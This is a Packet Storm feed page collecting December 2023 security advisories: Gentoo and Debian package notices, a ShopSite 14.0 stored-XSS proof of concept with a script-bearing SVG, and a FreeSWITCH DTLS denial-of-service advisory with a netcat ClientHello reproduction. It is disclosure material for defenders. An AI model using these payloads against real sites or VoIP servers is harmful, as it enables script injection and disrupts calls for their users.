Gentoo Linux Security Advisory 202312-15 - Several vulnerabilities have been found in Git, the worst of which could lead to remote code execution. Versions greater than or equal to 2.39.3 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-15  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Git: Multiple Vulnerabilities  
     Date: December 27, 2023  
     Bugs: #838127, #857831, #877565, #891221, #894472, #905088  
       ID: 202312-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Several vulnerabilities have been found in Git, the worst of which could  
lead to remote code execution.

Background  
==========

Git is a free and open source distributed version control system  
designed to handle everything from small to very large projects with  
speed and efficiency.

Affected packages  
=================

Package      Vulnerable    Unaffected  
-----------  ------------  ------------  
dev-vcs/git  < 2.39.3      >= 2.39.3

Description  
===========

Multiple vulnerabilities have been discovered in Git. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Git users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-vcs/git-2.39.3"

References  
==========

[ 1 ] CVE-2022-23521  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23521  
[ 2 ] CVE-2022-24765  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24765  
[ 3 ] CVE-2022-29187  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29187  
[ 4 ] CVE-2022-39253  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39253  
[ 5 ] CVE-2022-39260  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39260  
[ 6 ] CVE-2022-41903  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41903  
[ 7 ] CVE-2023-22490  
      https://nvd.nist.gov/vuln/detail/CVE-2023-22490  
[ 8 ] CVE-2023-23946  
      https://nvd.nist.gov/vuln/detail/CVE-2023-23946  
[ 9 ] CVE-2023-25652  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25652  
[ 10 ] CVE-2023-25815  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25815  
[ 11 ] CVE-2023-29007  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29007

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-15

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-15

ShopSite version 14.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: ShopSite Version: 14.0 - Stored XSS# Date: 2023-12-25# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://www.shopsite.com/# Version: 14.0# Tested on: https://www.shopsite.com/demo.html1 ) Upload poc.svg file here : https://demo.shopsite.com/cgi-bin/ssdemos/stores/alsdemo/ss/mediam.cgipoc.svg<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500">    <script>//<![CDATA[        alert(document.domain)    //]]>    </script></svg>2 ) Check here will be see alert button : https://a-demo-store.com/ssdemos/stores/alsdemo3/media/ss_sunglasses/aaa.svg

ShopSite 14.0 Cross Site Scripting

When handling DTLS-SRTP for media setup, FreeSWITCH version 1.10.10 is susceptible to denial of service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack.

# FreeSWITCH susceptible to Denial of Service via DTLS Hello packets during call initiation

- Fixed versions: 1.10.11  
- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2023-02-freeswitch-dtls-hello-race  
- Vendor Security Advisory: https://github.com/signalwire/freeswitch/security/advisories/GHSA-39gv-hq72-j6m6  
- Other references: CVE-2023-51443  
- Tested vulnerable versions: 1.10.10  
- Timeline:  
  - Report date: 2023-09-27  
  - Triaged: 2023-09-27  
  - Fix provided for testing: 2023-09-29  
  - Vendor release with fix: 2023-12-22  
  - Enable Security advisory: 2023-12-22

## TL;DR

When handling DTLS-SRTP for media setup, FreeSWITCH is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack.

## Description

Our research has shown that key establishment for Secure Real-time Transport Protocol (SRTP) using Datagram Transport Layer Security Extension (DTLS)[^1] is susceptible to a Denial of Service attack due to a race condition. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as `TLS_NULL_WITH_NULL_NULL`) to the port on the FreeSWITCH server that is expecting packets from the caller, a DTLS error is generated. This results in the media session being torn down, which is followed by teardown at signaling (SIP) level too.

This behavior was tested against FreeSWITCH version 1.10.10, which was found to be vulnerable to this issue.

The following sequence diagram shows the normal flow (i.e. no attack) involving SIP and DTLS messages between a UAC (the Caller) and an FreeSWITCH server capable of handling WebRTC calls.

Diagram showing a call setup against FreeSWITCH that uses SIP and DTLS:  
https://user-images.githubusercontent.com/4557407/271063734-85425e09-6945-49b1-ba73-751b6d592ea4.png

In a controlled experiment, it was observed that when the Attacker sent a DTLS ClientHello to FreeSWITCH's media port from a different IP and port, FreeSWITCH responded by sending a DTLS Alert to the Caller. Additionally, FreeSWITCH terminated the SIP call by sending a BYE message to the Caller.

Diagram showing a call setup against FreeSWITCH that fails due to an attacker controlled DTLS ClientHello:  
https://user-images.githubusercontent.com/4557407/271064011-032f9a0e-15af-4645-b008-1fe8b706d75e.png

During a real attack, the attacker would spray a vulnerable FreeSWITCH server with DTLS ClientHello messages. The attacker would typically target the range of UDP ports allocated for RTP. When the ClientHello message from the Attacker wins the race against an expected ClientHello from the Caller, the call terminates, resulting in Denial of Service.

## Impact

Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable FreeSWITCH servers for calls that rely on DTLS-SRTP.

## How to reproduce the issue

1. Prepare a FreeSWITCH server with an extension configured to handle WebRTC  
1. Send an INVITE message to the target server with WebRTC SDP:

    ```default  
  INVITE sip:1000@192.168.1.202 SIP/2.0  
  Via: SIP/2.0/WSS 192.168.1.202:36742;rport=36742;branch=z9hG4bK-jQcnXJadB2VGfGmQ  
  Max-Forwards: 70  
  From: <sip:1000@192.168.1.202>;tag=L9kc5NfpYG1u67cT  
  To: <sip:1000@192.168.1.202>  
  Contact: <sip:1000@192.168.1.202>  
  Call-ID: DzGnBLt0z9SK3MC0  
  CSeq: 5 INVITE  
  Content-Type: application/sdp  
  Content-Length: 385

  v=0  
  o=- 1695296331 1695296331 IN IP4 192.168.1.202  
  s=-  
  t=0 0  
  c=IN IP4 192.168.1.202  
  m=audio 45825 UDP/TLS/RTP/SAVPF 0 8 101  
  a=setup:active  
  a=fingerprint:sha-256 49:05:98:B2:15:43:1C:9C:4F:29:07:60:F8:63:77:16:80:F9:44:C0:97:8E:E5:48:D6:71:B4:03:10:85:D6:E3  
  a=rtpmap:0 PCMU/8000/1  
  a=rtpmap:8 PCMA/8000/1  
  a=rtpmap:101 telephone-event/8000  
  a=rtcp-mux  
  a=rtcprsize  
  a=sendrecv  
  ```  
1. Note FreeSWITCH's media port and IP values, which will be used as the `<freeswitch-ip>` and `<media-port>` parameters by the Attacker  
1. Send a DTLS ClientHello message from a (attacker-controlled) host, which is different from the Caller but has network access to the FreeSWITCH server

    ```bash  
  CLIENT_HELLO="Fv7/AAAAAAAAAAAAfAEAAHAAAAAAAAAAcP79AAA"   
  CLIENT_HELLO="${CLIENT_HELLO}AAG4HCVaUNVbYVmxuqdn2WyCgtTijhZ+WheP/+H"  
  CLIENT_HELLO="${CLIENT_HELLO}4AAAACAAABAABEABcAAP8BAAEAAAoACAAGAB0AF"  
  CLIENT_HELLO="${CLIENT_HELLO}wAYAAsAAgEAACMAAAANABQAEgQDCAQEAQUDCAUF"  
  CLIENT_HELLO="${CLIENT_HELLO}AQgGBgECAQAOAAkABgABAAgABwA="  
  echo -n "${CLIENT_HELLO}" | base64 --decode | nc -u <freeswitch-ip> <media-port>  
  ```  
1. Observe that the Caller received a DTLS Alert message and a SIP BYE message on its signaling channel

Note that the above steps are used to reliably reproduce the vulnerability. In case of a real attack, the attacker simply has to spray the FreeSWITCH server with DTLS messages.

## Solution and recommendations

To address this vulnerability, upgrade FreeSWITCH to the latest version which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check.

## About Enable Security

[Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.

## Disclaimer

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

## Disclosure policy

This report is subject to Enable Security's vulnerability disclosure policy which can be found at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>.

[^1]: Datagram Transport Layer Security (DTLS) Extension to Establish Keys for the Secure Real-time Transport Protocol (SRTP) https://datatracker.ietf.org/doc/html/rfc5764

--

     Sandro Gauci, CEO at Enable Security GmbH

    Register of Companies:       AG Charlottenburg HRB 173016 B  
    Company HQ:                       Neuburger Straße 101 b, 94036 Passau, Germany  
    RTCSec Newsletter:               https://www.rtcsec.com/subscribe  
    Our blog:                                https://www.rtcsec.com  
    Other points of contact:       https://www.enablesecurity.com/contact/

FreeSWITCH 1.10.10 Denial Of Service

Debian Linux Security Advisory 5588-1 - Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that the SSH protocol is prone to a prefix truncation attack, known as the "Terrapin attack". This attack allows a MITM attacker to effect a limited break of the integrity of the early encrypted SSH transport protocol by sending extra messages prior to the commencement of encryption, and deleting an equal number of consecutive messages immediately after encryption starts.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5588-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoDecember 24, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : puttyCVE ID         : CVE-2021-36367 CVE-2023-48795Debian Bug     : 990901Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that theSSH protocol is prone to a prefix truncation attack, known as the"Terrapin attack". This attack allows a MITM attacker to effect alimited break of the integrity of the early encrypted SSH transportprotocol by sending extra messages prior to the commencement ofencryption, and deleting an equal number of consecutive messagesimmediately after encryption starts.Details can be found at https://terrapin-attack.com/For the oldstable distribution (bullseye), these problems have been fixedin version 0.74-1+deb11u1. This update includes a fix for CVE-2021-36367.For the stable distribution (bookworm), these problems have been fixed inversion 0.78-2+deb12u1.We recommend that you upgrade your putty packages.For the detailed security status of putty please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/puttyFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmWIB5tfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0SDBQ/9FAw79bM9LfLI7aFS91kMvrxyhviu7KppEpM6V3OR6gCdrqj6L5MrWY5WG0+iYGdG1fHEoZkvYXq8HnMhsVBD5UuKDGHQ3Z15g1AaIc8tQ67cr7fM5PjYgijq8z3Vae0nH2WUn+ZIrdf4CnJ2dwiUa+M37UxyGfCNYoEID0KhZrYTuJFLWF5wrIqdp/upvzSBjQ1/fD0O8O6gK4ZCDhKU2/rZuMtnuiQ2ho3gH8J9odHyypqpNquQaslDM3SizrmheLZYhBbCKTggNd+kuMEgkeDg3VRih0VTOggh0CzR7NZbLitoviB5AvzVCFPviQCQOMKQPkBqgmKzDaobTOqwUZ+df4c63nxbENyrXGl9WwTAiBYT19TuX199TpgjHcmWYwPux6gdga3OHdo7m1eOMCG46S+joLDo6FnUcUMjA2+74z2z1IpYzE0vb+zK+l8Nu74RGY/gH5ewX9JCFGPRiPBwhtu0TavYO1nWbpcz0Z2jrUYIM7kS/3SpVUbiH9D+PyBJOawxDZSuiEhfOgilGl+r0d3MP0S0Lo2OoKPB9fgVYj5ICyn8ZBQz/bhxzi+wDV0XFkzM8fxdtbq4BwHVXzgmPKdabwZuNL9eViSF0XmSDG0lwFDDT1lKkCcBRnvdpvP0dxFzjfLnWZvISylGDR31q2ZGHIonDq+2yJcFHX8=qdiJ-----END PGP SIGNATURE-----

Debian Security Advisory 5588-1

Debian Linux Security Advisory 5587-1 - Two security issues were discovered in Curl: Cookies were incorrectly validated against the public suffix list of domains and in same cases HSTS data could fail to save to disk.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5587-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
December 23, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : curl  
CVE ID         : CVE-2023-46218 CVE-2023-46219

Two security issues were discovered in Curl: Cookies were incorrectly  
validated against the public suffix list of domains and in same cases  
HSTS data could fail to save to disk.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 7.74.0-1.3+deb11u11.

For the stable distribution (bookworm), these problems have been fixed in  
version 7.88.1-10+deb12u5.

We recommend that you upgrade your curl packages.

For the detailed security status of curl please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/curl

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmWHL5wACgkQEMKTtsN8  
TjZQ6g//Vkn19s5W4JDyQToH46D/GS8HU0yFFxl2FCTaQNVwipu0/o7MXJhn/bGP  
SvSJUXXszXOrYNQXNLxnAb5HLkG98FZD+SNMLhz329ggYnUa3yOYjFnU5xbacRQV  
tw7UN79ouX8bPCE6zJMuGqC6aA6JC7/RDTw15E3nqHeUtZagRK/y6Pp6lOXBveo0  
+fRb3opi+hMeSMr4QC+zw2pAxCYn2mRaZl7a42vxZ4iiuEfjTxMzYdJZSqosmd4a  
PIMcYtl8e1AmyDxD154rOzIVMobokcgx1CCmpPYbipiCuY2mp1Srm9GttSQSRTR0  
buk0GJxjcsk+QU6HNJ58UHHSGiVhWlMr370kT3cotO0YDvtVBeF8vSdrP8zmNoKQ  
IyBW9WP56XHgUvd+t7YN7tlUH11r9yZBZ04DAgGmW/QzLu6JHzmwKJx9JxxDr34y  
Y+mimCp9wI/ft3C0i/uarT1q6AsXA/LNXc1pqdU8QuXrJg2lAaMqqU8YT8l6iVi5  
i169oP0oezvOii5R/vw3cd/zzpKsNVwLyZfUWATYLRqzpbUbr94MsPCS+7fKOawY  
hCnAhUxx6/aDIWZmlVXkFtxbkskkBe9TTgc4nD0WVev7gPyImzSKzoaWYRMnsGMV  
DbdJgai96T4lXYI2PM2Gh4mZDdjqC4jubvSKJaM4MNF5Pq6VHf0=rARX  
-----END PGP SIGNATURE-----

Debian Security Advisory 5587-1

Gentoo Linux Security Advisory 202312-14 - Multiple vulnerabilities have been discovered in FFmpeg, the worst of which could lead to code execution. Versions greater than or equal to 6.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-14  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: FFmpeg: Multiple Vulnerabilities  
     Date: December 23, 2023  
     Bugs: #795696, #842267, #881523, #903805  
       ID: 202312-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilitiies have been discovered in FFmpeg, the worst of  
which could lead to code execution

Background  
=========  
FFmpeg is a complete solution to record, convert and stream audio and  
video.

Affected packages  
================  
Package             Vulnerable    Unaffected  
------------------  ------------  ------------  
media-video/ffmpeg  < 6.0         >= 6.0

Description  
==========  
Multiple vulnerabilities have been discovered in FFmpeg. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All FFmpeg 4 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-video/ffmpeg-4.4.3"

All FFmpeg 6 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-video/ffmpeg-6.0"

References  
=========  
[ 1 ] CVE-2021-33815  
      https://nvd.nist.gov/vuln/detail/CVE-2021-33815  
[ 2 ] CVE-2021-38171  
      https://nvd.nist.gov/vuln/detail/CVE-2021-38171  
[ 3 ] CVE-2021-38291  
      https://nvd.nist.gov/vuln/detail/CVE-2021-38291  
[ 4 ] CVE-2022-1475  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1475  
[ 5 ] CVE-2022-3964  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3964  
[ 6 ] CVE-2022-3965  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3965  
[ 7 ] CVE-2022-48434  
      https://nvd.nist.gov/vuln/detail/CVE-2022-48434

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-14

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-14

Gentoo Linux Security Advisory 202312-13 - Multiple vulnerabilities have been discovered in Gitea, the worst of which could result in information leakage. Versions greater than or equal to 1.20.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-13  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Gitea: Multiple Vulnerabilities  
     Date: December 23, 2023  
     Bugs: #887825, #891983, #905886, #918674  
       ID: 202312-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Gitea, the worst of  
which could result in information leakage.

Background  
=========  
Gitea is a painless self-hosted Git service.

Affected packages  
================  
Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
www-apps/gitea  < 1.20.6      >= 1.20.6

Description  
==========  
Multiple vulnerabilities have been discovered in Gitea. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Gitea users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-apps/gitea-1.20.6"

References  
=========  
[ 1 ] CVE-2023-3515  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3515

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-13

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-13

Gentoo Linux Security Advisory 202312-12 - Several vulnerabilities have been found in Flatpack, the worst of which lead to privilege escalation and sandbox escape. Versions greater than or equal to 1.14.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-12  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Flatpak: Multiple Vulnerabilities  
     Date: December 23, 2023  
     Bugs: #775365, #816951, #831087, #901507  
       ID: 202312-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Several vulnerabilities have been found in Flatpack, the worst of which  
lead to privilege escalation and sandbox escape.

Background  
=========  
Flatpak is a Linux application sandboxing and distribution framework.

Affected packages  
================  
Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
sys-apps/flatpak  < 1.14.4      >= 1.14.4

Description  
==========  
Multiple vulnerabilities have been discovered in Flatpak. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Flatpak users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-apps/flatpak-1.14.4"

References  
=========  
[ 1 ] CVE-2021-21381  
      https://nvd.nist.gov/vuln/detail/CVE-2021-21381  
[ 2 ] CVE-2021-41133  
      https://nvd.nist.gov/vuln/detail/CVE-2021-41133  
[ 3 ] CVE-2021-43860  
      https://nvd.nist.gov/vuln/detail/CVE-2021-43860  
[ 4 ] CVE-2022-21682  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21682  
[ 5 ] CVE-2023-28100  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28100  
[ 6 ] CVE-2023-28101  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28101  
[ 7 ] GHSA-67h7-w3jq-vh4q  
[ 8 ] GHSA-xgh4-387p-hqpp

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-12

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-12

Gentoo Linux Security Advisory 202312-11 - A vulnerability has been found in SABnzbd which allows for remote code execution. Versions greater than or equal to 4.0.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-11  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: SABnzbd: Remote Code Execution  
     Date: December 23, 2023  
     Bugs: #908032  
       ID: 202312-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in SABnzbd which allows for remote code  
execution.

Background  
=========  
Free and easy binary newsreader with web interface.

Affected packages  
================  
Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
net-nntp/sabnzbd  < 4.0.2       >= 4.0.2

Description  
==========  
A vulnerability has been discovered in SABnzbd. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
A design flaw was discovered in SABnzbd that could allow remote code  
execution. Manipulating the Parameters setting in the Notification  
Script functionality allows code execution with the privileges of the  
SABnzbd process. Exploiting the vulnerabilities requires access to the  
web interface. Remote exploitation is possible if users exposed their  
setup to the internet or other untrusted networks without setting a  
username/password. By default SABnzbd is only accessible from  
`localhost`, with no authentication required for the web interface.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All SABnzbd users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-nntp/sabnzbd-4.0.2"

References  
=========  
[ 1 ] CVE-2023-34237  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34237

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-11

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-11

Gentoo Linux Security Advisory 202312-10 - A vulnerability has been found in Ceph which can lead to root privilege escalation. Versions greater than or equal to 17.2.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Ceph: Root Privilege Escalation  
     Date: December 23, 2023  
     Bugs: #878277  
       ID: 202312-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in Ceph which can lead to root privilege  
escalation.

Background  
=========  
Ceph is a distributed network file system designed to provide excellent  
performance, reliability, and scalability.

Affected packages  
================  
Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
sys-cluster/ceph  < 17.2.6      >= 17.2.6

Description  
==========  
A vulnerability has been discovered in Ceph. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
The ceph-crash.service runs the ceph-crash Python script as root. The  
script is operating in the directory /var/lib/ceph/crash which is  
controlled by the unprivileged ceph user (ceph:ceph mode 0750). The  
script periodically scans for new crash directories and forwards the  
content via `ceph crash post`.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Ceph users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-cluster/ceph-17.2.6"

References  
=========  
[ 1 ] CVE-2022-3650  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3650

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-10

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Source

Packet Storm